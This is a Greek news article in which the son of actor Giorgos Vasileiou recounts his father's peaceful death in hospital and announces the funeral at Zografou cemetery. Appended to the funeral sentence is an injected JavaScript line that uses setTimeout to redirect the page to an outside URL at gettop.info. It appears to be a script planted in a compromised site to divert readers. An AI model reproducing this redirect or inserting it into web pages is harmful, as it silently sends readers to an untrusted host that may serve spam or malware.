Συγκινεί ο γιος του Γιώργου Βασιλείου: Έφυγε σαν πουλάκι, στον ύπνο του

0
7

 

Για την απώλεια του πατέρα του Γιώργου Βασιλείου και τις τελευταίες στιγμές του μίλησε στο star.gr ο γιος του Βασίλης. «Ο πατέρας μου έφυγε ήρεμος. Δεν κουράστηκε. Έφυγε χωρίς να παιδευτεί, σαν πουλάκι, κυριολεκτικά στον ύπνο του».

Ο Γιώργος Βασιλείου μεταφέρθηκε στο νοσοκομείο «Μεταξά» το απόγευμα της Κυριακής, στο οποίο είχε νοσηλευτεί ξανά πριν από μερικούς μήνες. «Ήμουν μαζί του μέχρι τις 12 παρά το βράδυ, μιλάγαμε, τον καλυνύχτισα, έφυγα, γιατί το πρωί δούλευα και του είπα ‘’πατέρα θα έρθω να σε δω ξανά την Πέμπτη’‘», εξομολογείται ο γιος του, Βασίλης. Στη μία και μισή το βράδυ, δέχεται τηλεφώνημα της μητέρας του, Λίας. «Οι γιατροί το κατάλαβαν ότι έφυγε από τη ζωή και το είπαν και στη μητέρα μου και εκείνη με πήρε τηλέφωνο…», συνέχισε μιλώντας στο star.gr: «Για μένα δεν έχει φύγει ο πατέρας μου».

«Ο πατέρας μου δεν ήθελε ποτέ να προκαλεί, έφυγε ήσυχος και ήρεμος, έτσι θέλουμε και εμείς να κλείσει η αυλαία του», είπε ο Βασίλης.

Η κησδεία θα γίνει από το Νεκροταφείο Ζωγράφου στις 13.30 την Πέμπτη. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here